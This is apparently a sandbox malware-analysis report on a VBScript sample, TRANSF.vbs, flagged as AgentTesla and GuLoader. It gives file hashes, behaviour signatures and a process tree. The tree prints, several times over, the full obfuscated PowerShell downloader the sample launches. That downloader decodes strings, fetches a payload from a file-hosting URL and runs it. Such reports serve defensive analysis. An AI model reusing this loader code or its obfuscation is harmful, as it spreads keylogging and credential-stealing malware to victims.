Overview

overview

10

Static

static

1

TRANSF.vbs

windows7-x64

10

TRANSF.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    24-09-2024 04:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TRANSF.vbs

  • Size

    19KB

  • MD5

    0f800567f6a43b8ffd8e798bc9f6d0ef

  • SHA1

    cafb5d7641be2a7b09df950ca18d4fcdce3d86c9

  • SHA256

    4ac0cae97c31320f59c86ff1a49916abe51417f3e71efbb2794a619285d5c2c5

  • SHA512

    84ce5da3d8b4effd3ee79c483919396f2cb4084da39ca4e8f868bfcf71af7b243693bb7ee9c0b208bf9737ce5b82f3b2d613fdb29737b2bf0007319898267964

  • SSDEEP

    384:QQ3GOmBsxCn6EPbz4KGsucW3k82RhyUKYHTKGPQ5PEf8szkM8vtbn2DlXQBb:t39cs86EPbjSmlTKGQPu8ckjF2Rab

Score
10/10
agentteslaguloaderdiscoverydownloaderexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TRANSF.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Birdmouthed Enciclopedia Cultirostres #>;$blaasyren='Optagelsesprven';<#Ammestuehistorierne Spried Ebullition Malous Multitarian Natskygge #>;$Quininise=$host.PrivateData;If ($Quininise) {$skaaneprogrammers++;}function Nonaristocratically($Duryl){$Sportsmanship217=$Duryl.Length-$skaaneprogrammers;for( $Insnarers=4;$Insnarers -lt $Sportsmanship217;$Insnarers+=5){$Consolatrix+=$Duryl[$Insnarers];}$Consolatrix;}function firsaariges($Ekspeditionssystemet){ & ($Shortness) ($Ekspeditionssystemet);}$eftertaklede=Nonaristocratically 'Sei,MPleaoPro,zbottiindul onelReciaEkst/Prim5Bjer. Lin0Hydr Stud(Ob iWFunki S,unId.odForeo arwWawisin e CaruNForhTFlyg Fris1 uri0Magn.Linj0Trfi; Sin PoliW Duvi PolnDdss6Sjnx4Sbed; A c BrocxAhnf6Anti4Kale; D,s ChamrSvmmv Cro:Defe1bro 2Pati1brk .Efte0k nt) .lu niveGBombeMa.ec psakPel,oGi s/ov.r2Dele0Krte1Sowf0 Res0 Hos1S ar0Sam 1La n Rin Fopsei,ostr PaneUncofEg,noHardxHava/ cha1traw2Oddv1 ema. Und0O ko ';$Aspidiaria=Nonaristocratically 'Sorgu AnsS SetEInsuR Pre-Ufora ForGFolkEDesiNb.jot ool ';$Fysiologer141=Nonaristocratically 'frithP sttOblitSpaap Kb.sStud:Baro/ Opl/An kd.epmrPreei TaxvBryge Lej.Sk lgP,ncoDireoSkibgDa alBortespif.Reprc AsyoFo km Uns/F lmuAnticHomo?UncreBeb.xSmi pT raoAutorHypetLila=DispdMusio ThlwHusgnR.celBrneoW ntaAfstdAfba& ndeiSupedKomp=Tato1AnabRfor FAn ivTuttkfa tqDaktbAd okB dsTAfteTGaskEA frl ittXMicrOB ohw pilrMediDZaba0Ren,EP ivb oriKase8Un uG BraO SubUPrimaSomaCSlutGguatWGyrooSomnGta shTsetL De ';$Panax=Nonaristocratically ' .er>Bort ';$Shortness=Nonaristocratically 'DrnnIState nsaxVild ';$Bewpers='Overnormality163';$overdrawing = Nonaristocratically 'Fur.eBuilc rehMu,io Sel Pral%HektaNonapDingpDenddUnliaAflyt OveaD xi%Octa\UnenBPerioBo.kk ndeoCala.Su nDJenmu Humc It Faci& ar& Pha OveestancVatihGlasoAl,a BriatS.is ';firsaariges (Nonaristocratically 'Bro $Undig Saml Wono VejbScria Resl nti: B.uP Fa ic,ullU jeoTet,tNyans Appy SkasUn.et Fo eTal mVridePostrforvsSlop=Afgi(StalcHushmcentdIrre T al/AerocServ Krep$ PomoSandv roeSlr.rWaxydDikerb dyaLin wViatiDansn PengSmil)over ');firsaariges (Nonaristocratically 'Luge$sinog Aa lPerfo reabGardaBactlReca:Ens Fpar,oModerKn vrSvine nentcoelnKonki ran Anng PrasFibrgNoniaMedun .ilg,ande Gennmilj=Sekt$VlveFAbbay arksTes.iTilfo SoulPilgoR,gigDe.oeSubmr,ene1Side4Soli1Kryo. F.os vulp DeclPreci rstGle (Irre$RediPtilva Po n Te aNewtxKo s)Menn ');firsaariges (Nonaristocratically ' Sca[MorbN.ngle SmatGrow.ResoS Sy eSkjarMascvRedaiStilc tykeLsreP DeloNonpiModsn JodtMyliMLampaOpfanApsia betgReepe OmhrOpfo]Arv : Ic,:DesiSI iteTid cSkiluBaftr hvii Re t S kyAlbuPNo pr PiroPi dtLaunoFirec De.oMat lAcce Uni=Pl i Rhod[Sp,nN arteDismtAfsk.PeriSbelgeneoncEma uUnexrN rriIndotAktuyUnhyPMal rSubooDatotC.rroRingcBungoLabilEnsiTOve yBaggpfljte Per]Komm:kerf:Inu,TBorolgastsO er1Cari2Te p ');$Fysiologer141=$Forretningsgangen[0];$Microcomputers= (Nonaristocratically ' Pal$ForggTearLRappOAspab yopATalllLavs:No.nJBracEPapia Mo N WitNGinkASkam7Urti1Kurs=sty NToldeNutrWChai-M ndOLoatbSpavJpreceTon cCopatVen ends FruYPre stowntCy,leaabnMTher.IndgNnymaerorst,nel.ForuwD spES brB.usoCpa alBev,iM.saEOrphN U dT');$Microcomputers+=$Pilotsystemers[1];firsaariges ($Microcomputers);firsaariges (Nonaristocratically 'Laza$textJStraeLigeaGoatnSternRet aB un7Cyke1Tart. SouH RameSnowaA,sadUgene PhrrA ris Fer[Inte$IchtA nonsS,alpKateiRespd U si PikaKo srLipsi u,faF,rl] Agn=Iris$Sha.eStorfVerdtBrave DanrUns tHon a.uftk url laeConsdvyaseSubm ');$Ophugning=Nonaristocratically 'Unde$ .riJ Vrde Stra ,non Oprn hilarin 7 Co 1.idt.MoonDunboo.aprwSandnAndelNavloNiveaPrivd raFsauciTrill Omre inu( Fli$ GasFFilmyRygtsB buiducho TurlSuffoSlupg,olie F rrHjla1,amm4Ggl 1Omst, Unf$ TeeSUnfauIntelCistp Fe hdat oFysibBr.deBrusnFotozadkooBio.a Bagt Teae Fem1Acry5Bold7 No ) raa ';$Sulphobenzoate157=$Pilotsystemers[0];firsaariges (Nonaristocratically 'Chup$ Vi,gFrarLskruO R.aBEde ASpttlScr.: ymR ForeAdeslIndeaH ndKAdhrsHemaaUndeTBe sI pneoF.brnbulkE s,rr riSUsig=Ch m( In TLsthE AlmSThrutMetr-F.asP skrA LymtBarrhCros Floa$Enhos tunU,avnlL xipDezihBorgorevoB ZooE TyvnOverzBogaoMartAs azT onveSkab1 Dde5 om7 Dol)Samp ');while (!$Relaksationers) {firsaariges (Nonaristocratically ' tat$ CutgChoulfremo houb rteaSomnl Sek:Fu hUAgusnRek,lF,naoSpiro olisGlyce ResnF essSyre=Co n$NasutNewpr ndku jereddss ') ;firsaariges $Ophugning;firsaariges (Nonaristocratically '.rotSLaget usta adarF rstNeu -Act SBeamlTaraeGange aupGryd Dei4Libe ');firsaariges (Nonaristocratically 'e os$ evegForelPolyoL,ncbEmita Spil tuk:InexRSteveMrenl VitaFi ikS ccsreviaBrant isaiValgoImpunSucceChinr Br s Pl,=Sk r(NuanTansteSobesAa,rtSlov-Sk lP lapaFreatYahahVold Fre$M taSUdbluC nslDambpIc,nh ticomu rb Keke.yern Wi.zm djoAmela rebtTi reFict1Spr,5Sjof7Vdd,)Toas ') ;firsaariges (Nonaristocratically 'Fods$ UdsgPsyclKonsoN.pobBl vaUnail tj:BlndMBetve nddAut vBortiCloon.evad Ka eSis.nUdk.eSi msetap=Prot$culggF skl Ac oE,mebWearaKamel Sp :NulpTNumea FibsUdletPloutFlokrmi.ry KrnkResi+Salg+Indl%Vild$Uv,dF lao o frS.ror Same Spst FstnForui ,uanAmmug TytsSoprg,chia mfonBarygperieRettnObve.rystcSavaolegiu GognErhvtForm ') ;$Fysiologer141=$Forretningsgangen[$Medvindenes];}$Maaneformrkelserne=309487;$Flugtskydningens=27293;firsaariges (Nonaristocratically ' ,un$Var gGeodlKlamo,capbingeaRentlSter:HereSOakukKommo,alalV,lfdb.rtk Famomatup ,nipNegle .orrdebonBalkeByggs nv F.te=Bi a ardG utne.efutBouc-SothC Ekso Oven Fe tStrae CadnNonotImmi heli$TrueSRa suspecl ReipGra,hLukko.ullbCa aeFragnEndazMesao ,apa .ewtol fePhil1Co m5hjde7Elec ');firsaariges (Nonaristocratically 'nat $Festg rotlV rioBogwb FlaaClumlArbe:WabbSPluseAltrcMicrtRiveiParal,ambeSl p Rand= Vi Acco[,berSRadiy s isSisktBroge UnpmFlyv. OveCAfdroKollnDeglv OveeTautrPlagtDemo]Fore: For:KompF BoxrS anoHarrm OplBNonraCrissMeteeAmts6Inde4 GokSNomatSkovr Alli B,nn undgTota(Unic$M siS,eunkkom oapprlSubddU rakBo doRe lpWi wpOvereOpkrrLighnVarneHalvsSeac)Op e ');firsaariges (Nonaristocratically ' Che$Fa igl eblF ruoK erb sh aUnwalSves:CaluYOdysa G.ag WreuQue,aByggsUd.i Infl=O,dr Kamp[ G nSe teyDomesOdobt s neTe emK um.Hel TTecae Va.x ogatAddu.BracEPrognVrngcBam oBrowdHexaiOtacnM neg Pol]Laps:crys: arAForrSBe kC Of I Me.IKuve.Ne,kGArmheTrestVoksSOmsttfagfr osiByrdnKomigPlio( Ill$TranSUndeembelcD,sktEntriPerol P de,upe)supe ');firsaariges (Nonaristocratically 'Stvl$j legkefflForeo PorbKalkaIn,olPas :TumuUDilin Appd PiveA.alr Br vindvgMeletFrigeLe,ttMonosSens=Re o$Sup Y KonaExplgForfuForwaL xns ure.Damps ph u nkebTohasAfspt ClarPalmiSignn K,tg S i(Visi$FamiMbyriaHackaReklnB dseTilkf Talo .ntrSkelmSitir iktkUdraeUnsilNed.sFliceIns rErgunPeyoeVa i,Phyl$A atF Th,lAmm uStamgLyketSandsOgdokUndayDis dVelsnLan.i ,genOverg sube.rrenLslas Fr ) cab ');firsaariges $Undervgtets;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:872
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Boko.Duc && echo t"
        3⤵
          PID:2728
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Birdmouthed Enciclopedia Cultirostres #>;$blaasyren='Optagelsesprven';<#Ammestuehistorierne Spried Ebullition Malous Multitarian Natskygge #>;$Quininise=$host.PrivateData;If ($Quininise) {$skaaneprogrammers++;}function Nonaristocratically($Duryl){$Sportsmanship217=$Duryl.Length-$skaaneprogrammers;for( $Insnarers=4;$Insnarers -lt $Sportsmanship217;$Insnarers+=5){$Consolatrix+=$Duryl[$Insnarers];}$Consolatrix;}function firsaariges($Ekspeditionssystemet){ & ($Shortness) ($Ekspeditionssystemet);}$eftertaklede=Nonaristocratically 'Sei,MPleaoPro,zbottiindul onelReciaEkst/Prim5Bjer. Lin0Hydr Stud(Ob iWFunki S,unId.odForeo arwWawisin e CaruNForhTFlyg Fris1 uri0Magn.Linj0Trfi; Sin PoliW Duvi PolnDdss6Sjnx4Sbed; A c BrocxAhnf6Anti4Kale; D,s ChamrSvmmv Cro:Defe1bro 2Pati1brk .Efte0k nt) .lu niveGBombeMa.ec psakPel,oGi s/ov.r2Dele0Krte1Sowf0 Res0 Hos1S ar0Sam 1La n Rin Fopsei,ostr PaneUncofEg,noHardxHava/ cha1traw2Oddv1 ema. Und0O ko ';$Aspidiaria=Nonaristocratically 'Sorgu AnsS SetEInsuR Pre-Ufora ForGFolkEDesiNb.jot ool ';$Fysiologer141=Nonaristocratically 'frithP sttOblitSpaap Kb.sStud:Baro/ Opl/An kd.epmrPreei TaxvBryge Lej.Sk lgP,ncoDireoSkibgDa alBortespif.Reprc AsyoFo km Uns/F lmuAnticHomo?UncreBeb.xSmi pT raoAutorHypetLila=DispdMusio ThlwHusgnR.celBrneoW ntaAfstdAfba& ndeiSupedKomp=Tato1AnabRfor FAn ivTuttkfa tqDaktbAd okB dsTAfteTGaskEA frl ittXMicrOB ohw pilrMediDZaba0Ren,EP ivb oriKase8Un uG BraO SubUPrimaSomaCSlutGguatWGyrooSomnGta shTsetL De ';$Panax=Nonaristocratically ' .er>Bort ';$Shortness=Nonaristocratically 'DrnnIState nsaxVild ';$Bewpers='Overnormality163';$overdrawing = Nonaristocratically 'Fur.eBuilc rehMu,io Sel Pral%HektaNonapDingpDenddUnliaAflyt OveaD xi%Octa\UnenBPerioBo.kk ndeoCala.Su nDJenmu Humc It Faci& ar& Pha OveestancVatihGlasoAl,a BriatS.is ';firsaariges (Nonaristocratically 'Bro $Undig Saml Wono VejbScria Resl nti: B.uP Fa ic,ullU jeoTet,tNyans Appy SkasUn.et Fo eTal mVridePostrforvsSlop=Afgi(StalcHushmcentdIrre T al/AerocServ Krep$ PomoSandv roeSlr.rWaxydDikerb dyaLin wViatiDansn PengSmil)over ');firsaariges (Nonaristocratically 'Luge$sinog Aa lPerfo reabGardaBactlReca:Ens Fpar,oModerKn vrSvine nentcoelnKonki ran Anng PrasFibrgNoniaMedun .ilg,ande Gennmilj=Sekt$VlveFAbbay arksTes.iTilfo SoulPilgoR,gigDe.oeSubmr,ene1Side4Soli1Kryo. F.os vulp DeclPreci rstGle (Irre$RediPtilva Po n Te aNewtxKo s)Menn ');firsaariges (Nonaristocratically ' Sca[MorbN.ngle SmatGrow.ResoS Sy eSkjarMascvRedaiStilc tykeLsreP DeloNonpiModsn JodtMyliMLampaOpfanApsia betgReepe OmhrOpfo]Arv : Ic,:DesiSI iteTid cSkiluBaftr hvii Re t S kyAlbuPNo pr PiroPi dtLaunoFirec De.oMat lAcce Uni=Pl i Rhod[Sp,nN arteDismtAfsk.PeriSbelgeneoncEma uUnexrN rriIndotAktuyUnhyPMal rSubooDatotC.rroRingcBungoLabilEnsiTOve yBaggpfljte Per]Komm:kerf:Inu,TBorolgastsO er1Cari2Te p ');$Fysiologer141=$Forretningsgangen[0];$Microcomputers= (Nonaristocratically ' Pal$ForggTearLRappOAspab yopATalllLavs:No.nJBracEPapia Mo N WitNGinkASkam7Urti1Kurs=sty NToldeNutrWChai-M ndOLoatbSpavJpreceTon cCopatVen ends FruYPre stowntCy,leaabnMTher.IndgNnymaerorst,nel.ForuwD spES brB.usoCpa alBev,iM.saEOrphN U dT');$Microcomputers+=$Pilotsystemers[1];firsaariges ($Microcomputers);firsaariges (Nonaristocratically 'Laza$textJStraeLigeaGoatnSternRet aB un7Cyke1Tart. SouH RameSnowaA,sadUgene PhrrA ris Fer[Inte$IchtA nonsS,alpKateiRespd U si PikaKo srLipsi u,faF,rl] Agn=Iris$Sha.eStorfVerdtBrave DanrUns tHon a.uftk url laeConsdvyaseSubm ');$Ophugning=Nonaristocratically 'Unde$ .riJ Vrde Stra ,non Oprn hilarin 7 Co 1.idt.MoonDunboo.aprwSandnAndelNavloNiveaPrivd raFsauciTrill Omre inu( Fli$ GasFFilmyRygtsB buiducho TurlSuffoSlupg,olie F rrHjla1,amm4Ggl 1Omst, Unf$ TeeSUnfauIntelCistp Fe hdat oFysibBr.deBrusnFotozadkooBio.a Bagt Teae Fem1Acry5Bold7 No ) raa ';$Sulphobenzoate157=$Pilotsystemers[0];firsaariges (Nonaristocratically 'Chup$ Vi,gFrarLskruO R.aBEde ASpttlScr.: ymR ForeAdeslIndeaH ndKAdhrsHemaaUndeTBe sI pneoF.brnbulkE s,rr riSUsig=Ch m( In TLsthE AlmSThrutMetr-F.asP skrA LymtBarrhCros Floa$Enhos tunU,avnlL xipDezihBorgorevoB ZooE TyvnOverzBogaoMartAs azT onveSkab1 Dde5 om7 Dol)Samp ');while (!$Relaksationers) {firsaariges (Nonaristocratically ' tat$ CutgChoulfremo houb rteaSomnl Sek:Fu hUAgusnRek,lF,naoSpiro olisGlyce ResnF essSyre=Co n$NasutNewpr ndku jereddss ') ;firsaariges $Ophugning;firsaariges (Nonaristocratically '.rotSLaget usta adarF rstNeu -Act SBeamlTaraeGange aupGryd Dei4Libe ');firsaariges (Nonaristocratically 'e os$ evegForelPolyoL,ncbEmita Spil tuk:InexRSteveMrenl VitaFi ikS ccsreviaBrant isaiValgoImpunSucceChinr Br s Pl,=Sk r(NuanTansteSobesAa,rtSlov-Sk lP lapaFreatYahahVold Fre$M taSUdbluC nslDambpIc,nh ticomu rb Keke.yern Wi.zm djoAmela rebtTi reFict1Spr,5Sjof7Vdd,)Toas ') ;firsaariges (Nonaristocratically 'Fods$ UdsgPsyclKonsoN.pobBl vaUnail tj:BlndMBetve nddAut vBortiCloon.evad Ka eSis.nUdk.eSi msetap=Prot$culggF skl Ac oE,mebWearaKamel Sp :NulpTNumea FibsUdletPloutFlokrmi.ry KrnkResi+Salg+Indl%Vild$Uv,dF lao o frS.ror Same Spst FstnForui ,uanAmmug TytsSoprg,chia mfonBarygperieRettnObve.rystcSavaolegiu GognErhvtForm ') ;$Fysiologer141=$Forretningsgangen[$Medvindenes];}$Maaneformrkelserne=309487;$Flugtskydningens=27293;firsaariges (Nonaristocratically ' ,un$Var gGeodlKlamo,capbingeaRentlSter:HereSOakukKommo,alalV,lfdb.rtk Famomatup ,nipNegle .orrdebonBalkeByggs nv F.te=Bi a ardG utne.efutBouc-SothC Ekso Oven Fe tStrae CadnNonotImmi heli$TrueSRa suspecl ReipGra,hLukko.ullbCa aeFragnEndazMesao ,apa .ewtol fePhil1Co m5hjde7Elec ');firsaariges (Nonaristocratically 'nat $Festg rotlV rioBogwb FlaaClumlArbe:WabbSPluseAltrcMicrtRiveiParal,ambeSl p Rand= Vi Acco[,berSRadiy s isSisktBroge UnpmFlyv. OveCAfdroKollnDeglv OveeTautrPlagtDemo]Fore: For:KompF BoxrS anoHarrm OplBNonraCrissMeteeAmts6Inde4 GokSNomatSkovr Alli B,nn undgTota(Unic$M siS,eunkkom oapprlSubddU rakBo doRe lpWi wpOvereOpkrrLighnVarneHalvsSeac)Op e ');firsaariges (Nonaristocratically ' Che$Fa igl eblF ruoK erb sh aUnwalSves:CaluYOdysa G.ag WreuQue,aByggsUd.i Infl=O,dr Kamp[ G nSe teyDomesOdobt s neTe emK um.Hel TTecae Va.x ogatAddu.BracEPrognVrngcBam oBrowdHexaiOtacnM neg Pol]Laps:crys: arAForrSBe kC Of I Me.IKuve.Ne,kGArmheTrestVoksSOmsttfagfr osiByrdnKomigPlio( Ill$TranSUndeembelcD,sktEntriPerol P de,upe)supe ');firsaariges (Nonaristocratically 'Stvl$j legkefflForeo PorbKalkaIn,olPas :TumuUDilin Appd PiveA.alr Br vindvgMeletFrigeLe,ttMonosSens=Re o$Sup Y KonaExplgForfuForwaL xns ure.Damps ph u nkebTohasAfspt ClarPalmiSignn K,tg S i(Visi$FamiMbyriaHackaReklnB dseTilkf Talo .ntrSkelmSitir iktkUdraeUnsilNed.sFliceIns rErgunPeyoeVa i,Phyl$A atF Th,lAmm uStamgLyketSandsOgdokUndayDis dVelsnLan.i ,genOverg sube.rrenLslas Fr ) cab ');firsaariges $Undervgtets;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2648
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Birdmouthed Enciclopedia Cultirostres #>;$blaasyren='Optagelsesprven';<#Ammestuehistorierne Spried Ebullition Malous Multitarian Natskygge #>;$Quininise=$host.PrivateData;If ($Quininise) {$skaaneprogrammers++;}function Nonaristocratically($Duryl){$Sportsmanship217=$Duryl.Length-$skaaneprogrammers;for( $Insnarers=4;$Insnarers -lt $Sportsmanship217;$Insnarers+=5){$Consolatrix+=$Duryl[$Insnarers];}$Consolatrix;}function firsaariges($Ekspeditionssystemet){ & ($Shortness) ($Ekspeditionssystemet);}$eftertaklede=Nonaristocratically 'Sei,MPleaoPro,zbottiindul onelReciaEkst/Prim5Bjer. Lin0Hydr Stud(Ob iWFunki S,unId.odForeo arwWawisin e CaruNForhTFlyg Fris1 uri0Magn.Linj0Trfi; Sin PoliW Duvi PolnDdss6Sjnx4Sbed; A c BrocxAhnf6Anti4Kale; D,s ChamrSvmmv Cro:Defe1bro 2Pati1brk .Efte0k nt) .lu niveGBombeMa.ec psakPel,oGi s/ov.r2Dele0Krte1Sowf0 Res0 Hos1S ar0Sam 1La n Rin Fopsei,ostr PaneUncofEg,noHardxHava/ cha1traw2Oddv1 ema. Und0O ko ';$Aspidiaria=Nonaristocratically 'Sorgu AnsS SetEInsuR Pre-Ufora ForGFolkEDesiNb.jot ool ';$Fysiologer141=Nonaristocratically 'frithP sttOblitSpaap Kb.sStud:Baro/ Opl/An kd.epmrPreei TaxvBryge Lej.Sk lgP,ncoDireoSkibgDa alBortespif.Reprc AsyoFo km Uns/F lmuAnticHomo?UncreBeb.xSmi pT raoAutorHypetLila=DispdMusio ThlwHusgnR.celBrneoW ntaAfstdAfba& ndeiSupedKomp=Tato1AnabRfor FAn ivTuttkfa tqDaktbAd okB dsTAfteTGaskEA frl ittXMicrOB ohw pilrMediDZaba0Ren,EP ivb oriKase8Un uG BraO SubUPrimaSomaCSlutGguatWGyrooSomnGta shTsetL De ';$Panax=Nonaristocratically ' .er>Bort ';$Shortness=Nonaristocratically 'DrnnIState nsaxVild ';$Bewpers='Overnormality163';$overdrawing = Nonaristocratically 'Fur.eBuilc rehMu,io Sel Pral%HektaNonapDingpDenddUnliaAflyt OveaD xi%Octa\UnenBPerioBo.kk ndeoCala.Su nDJenmu Humc It Faci& ar& Pha OveestancVatihGlasoAl,a BriatS.is ';firsaariges (Nonaristocratically 'Bro $Undig Saml Wono VejbScria Resl nti: B.uP Fa ic,ullU jeoTet,tNyans Appy SkasUn.et Fo eTal mVridePostrforvsSlop=Afgi(StalcHushmcentdIrre T al/AerocServ Krep$ PomoSandv roeSlr.rWaxydDikerb dyaLin wViatiDansn PengSmil)over ');firsaariges (Nonaristocratically 'Luge$sinog Aa lPerfo reabGardaBactlReca:Ens Fpar,oModerKn vrSvine nentcoelnKonki ran Anng PrasFibrgNoniaMedun .ilg,ande Gennmilj=Sekt$VlveFAbbay arksTes.iTilfo SoulPilgoR,gigDe.oeSubmr,ene1Side4Soli1Kryo. F.os vulp DeclPreci rstGle (Irre$RediPtilva Po n Te aNewtxKo s)Menn ');firsaariges (Nonaristocratically ' Sca[MorbN.ngle SmatGrow.ResoS Sy eSkjarMascvRedaiStilc tykeLsreP DeloNonpiModsn JodtMyliMLampaOpfanApsia betgReepe OmhrOpfo]Arv : Ic,:DesiSI iteTid cSkiluBaftr hvii Re t S kyAlbuPNo pr PiroPi dtLaunoFirec De.oMat lAcce Uni=Pl i Rhod[Sp,nN arteDismtAfsk.PeriSbelgeneoncEma uUnexrN rriIndotAktuyUnhyPMal rSubooDatotC.rroRingcBungoLabilEnsiTOve yBaggpfljte Per]Komm:kerf:Inu,TBorolgastsO er1Cari2Te p ');$Fysiologer141=$Forretningsgangen[0];$Microcomputers= (Nonaristocratically ' Pal$ForggTearLRappOAspab yopATalllLavs:No.nJBracEPapia Mo N WitNGinkASkam7Urti1Kurs=sty NToldeNutrWChai-M ndOLoatbSpavJpreceTon cCopatVen ends FruYPre stowntCy,leaabnMTher.IndgNnymaerorst,nel.ForuwD spES brB.usoCpa alBev,iM.saEOrphN U dT');$Microcomputers+=$Pilotsystemers[1];firsaariges ($Microcomputers);firsaariges (Nonaristocratically 'Laza$textJStraeLigeaGoatnSternRet aB un7Cyke1Tart. SouH RameSnowaA,sadUgene PhrrA ris Fer[Inte$IchtA nonsS,alpKateiRespd U si PikaKo srLipsi u,faF,rl] Agn=Iris$Sha.eStorfVerdtBrave DanrUns tHon a.uftk url laeConsdvyaseSubm ');$Ophugning=Nonaristocratically 'Unde$ .riJ Vrde Stra ,non Oprn hilarin 7 Co 1.idt.MoonDunboo.aprwSandnAndelNavloNiveaPrivd raFsauciTrill Omre inu( Fli$ GasFFilmyRygtsB buiducho TurlSuffoSlupg,olie F rrHjla1,amm4Ggl 1Omst, Unf$ TeeSUnfauIntelCistp Fe hdat oFysibBr.deBrusnFotozadkooBio.a Bagt Teae Fem1Acry5Bold7 No ) raa ';$Sulphobenzoate157=$Pilotsystemers[0];firsaariges (Nonaristocratically 'Chup$ Vi,gFrarLskruO R.aBEde ASpttlScr.: ymR ForeAdeslIndeaH ndKAdhrsHemaaUndeTBe sI pneoF.brnbulkE s,rr riSUsig=Ch m( In TLsthE AlmSThrutMetr-F.asP skrA LymtBarrhCros Floa$Enhos tunU,avnlL xipDezihBorgorevoB ZooE TyvnOverzBogaoMartAs azT onveSkab1 Dde5 om7 Dol)Samp ');while (!$Relaksationers) {firsaariges (Nonaristocratically ' tat$ CutgChoulfremo houb rteaSomnl Sek:Fu hUAgusnRek,lF,naoSpiro olisGlyce ResnF essSyre=Co n$NasutNewpr ndku jereddss ') ;firsaariges $Ophugning;firsaariges (Nonaristocratically '.rotSLaget usta adarF rstNeu -Act SBeamlTaraeGange aupGryd Dei4Libe ');firsaariges (Nonaristocratically 'e os$ evegForelPolyoL,ncbEmita Spil tuk:InexRSteveMrenl VitaFi ikS ccsreviaBrant isaiValgoImpunSucceChinr Br s Pl,=Sk r(NuanTansteSobesAa,rtSlov-Sk lP lapaFreatYahahVold Fre$M taSUdbluC nslDambpIc,nh ticomu rb Keke.yern Wi.zm djoAmela rebtTi reFict1Spr,5Sjof7Vdd,)Toas ') ;firsaariges (Nonaristocratically 'Fods$ UdsgPsyclKonsoN.pobBl vaUnail tj:BlndMBetve nddAut vBortiCloon.evad Ka eSis.nUdk.eSi msetap=Prot$culggF skl Ac oE,mebWearaKamel Sp :NulpTNumea FibsUdletPloutFlokrmi.ry KrnkResi+Salg+Indl%Vild$Uv,dF lao o frS.ror Same Spst FstnForui ,uanAmmug TytsSoprg,chia mfonBarygperieRettnObve.rystcSavaolegiu GognErhvtForm ') ;$Fysiologer141=$Forretningsgangen[$Medvindenes];}$Maaneformrkelserne=309487;$Flugtskydningens=27293;firsaariges (Nonaristocratically ' ,un$Var gGeodlKlamo,capbingeaRentlSter:HereSOakukKommo,alalV,lfdb.rtk Famomatup ,nipNegle .orrdebonBalkeByggs nv F.te=Bi a ardG utne.efutBouc-SothC Ekso Oven Fe tStrae CadnNonotImmi heli$TrueSRa suspecl ReipGra,hLukko.ullbCa aeFragnEndazMesao ,apa .ewtol fePhil1Co m5hjde7Elec ');firsaariges (Nonaristocratically 'nat $Festg rotlV rioBogwb FlaaClumlArbe:WabbSPluseAltrcMicrtRiveiParal,ambeSl p Rand= Vi Acco[,berSRadiy s isSisktBroge UnpmFlyv. OveCAfdroKollnDeglv OveeTautrPlagtDemo]Fore: For:KompF BoxrS anoHarrm OplBNonraCrissMeteeAmts6Inde4 GokSNomatSkovr Alli B,nn undgTota(Unic$M siS,eunkkom oapprlSubddU rakBo doRe lpWi wpOvereOpkrrLighnVarneHalvsSeac)Op e ');firsaariges (Nonaristocratically ' Che$Fa igl eblF ruoK erb sh aUnwalSves:CaluYOdysa G.ag WreuQue,aByggsUd.i Infl=O,dr Kamp[ G nSe teyDomesOdobt s neTe emK um.Hel TTecae Va.x ogatAddu.BracEPrognVrngcBam oBrowdHexaiOtacnM neg Pol]Laps:crys: arAForrSBe kC Of I Me.IKuve.Ne,kGArmheTrestVoksSOmsttfagfr osiByrdnKomigPlio( Ill$TranSUndeembelcD,sktEntriPerol P de,upe)supe ');firsaariges (Nonaristocratically 'Stvl$j legkefflForeo PorbKalkaIn,olPas :TumuUDilin Appd PiveA.alr Br vindvgMeletFrigeLe,ttMonosSens=Re o$Sup Y KonaExplgForfuForwaL xns ure.Damps ph u nkebTohasAfspt ClarPalmiSignn K,tg S i(Visi$FamiMbyriaHackaReklnB dseTilkf Talo .ntrSkelmSitir iktkUdraeUnsilNed.sFliceIns rErgunPeyoeVa i,Phyl$A atF Th,lAmm uStamgLyketSandsOgdokUndayDis dVelsnLan.i ,genOverg 